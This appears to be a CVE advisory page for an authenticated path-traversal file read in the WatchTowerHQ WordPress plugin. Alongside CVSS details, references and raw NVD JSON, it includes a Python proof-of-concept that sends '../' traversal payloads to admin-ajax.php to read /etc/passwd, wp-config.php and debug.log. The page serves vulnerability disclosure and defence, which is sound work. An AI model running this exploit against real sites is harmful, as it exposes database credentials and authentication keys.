Security Vulnerability Report
CVE-2025-13972 CVSS 4.9 MEDIUM

CVE-2025-13972

Published: 2025-12-12 04:15:45
Last Modified: 2026-04-15 00:35:42

Description

The WatchTowerHQ plugin for WordPress is vulnerable to arbitrary file read via the 'wht_download_big_object_origin' parameter in all versions up to, and including, 3.16.0. This is due to insufficient path validation in the handle_big_object_download_request function. This makes it possible for authenticated attackers, with administrator-level access and a valid access token, to read arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys.

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WatchTowerHQ Plugin <= 3.16.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13972 PoC - WatchTowerHQ Plugin Arbitrary File Read
# Requires: Administrator access + valid access token

TARGET_URL = "http://target-wordpress-site.com"
ACCESS_TOKEN = "your_valid_access_token"
ADMIN_COOKIE = "wordpress_admin_cookie_here"


def read_arbitrary_file(file_path):
    """
    Attempt to read arbitrary file via WatchTowerHQ plugin vulnerability
    """
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "X-WH-Access-Token": ACCESS_TOKEN,
        "Cookie": ADMIN_COOKIE,
    }

    # Construct malicious payload with path traversal
    # File path can be: ../../../../../../../../../../../..{target_file}
    payload = (
        "action=wht_big_object_download"
        f"&wht_download_big_object_origin=../../../../../../../../../../../..{file_path}"
    )

    try:
        response = requests.post(endpoint, headers=headers, data=payload, timeout=30)
        if response.status_code == 200 and len(response.content) > 0:
            print(f"[+] Successfully read: {file_path}")
            print(f"[+] Content length: {len(response.content)} bytes")
            return response.content
        else:
            print(f"[-] Failed to read: {file_path}")
            return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    print("CVE-2025-13972 WatchTowerHQ Arbitrary File Read PoC")
    print("=" * 60)

    # Target files to read
    targets = [
        "etc/passwd",
        "var/www/html/wp-config.php",
        "var/www/html/wp-content/debug.log",
    ]

    for target in targets:
        content = read_arbitrary_file(target)
        if content:
            print("\n[File Content Start]")
            print(content.decode("utf-8", errors="ignore")[:500])
            print("[File Content End]\n")
```

References

https://plugins.trac.wordpress.org/browser/watchtowerhq/tags/3.15.0/src/Download.php#L104
https://plugins.trac.wordpress.org/browser/watchtowerhq/trunk/src/Download.php#L104
https://www.wordfence.com/threat-intel/vulnerabilities/id/13fcbff8-8560-48ca-82df-8b620961d9c6?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13972",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T04:15:45.183",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WatchTowerHQ plugin for WordPress is vulnerable to arbitrary file read via the 'wht_download_big_object_origin' parameter in all versions up to, and including, 3.16.0. This is due to insufficient path validation in the handle_big_object_download_request function. This makes it possible for authenticated attackers, with administrator-level access and a valid access token, to read arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/watchtowerhq/tags/3.15.0/src/Download.php#L104",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/watchtowerhq/trunk/src/Download.php#L104",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/13fcbff8-8560-48ca-82df-8b620961d9c6?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```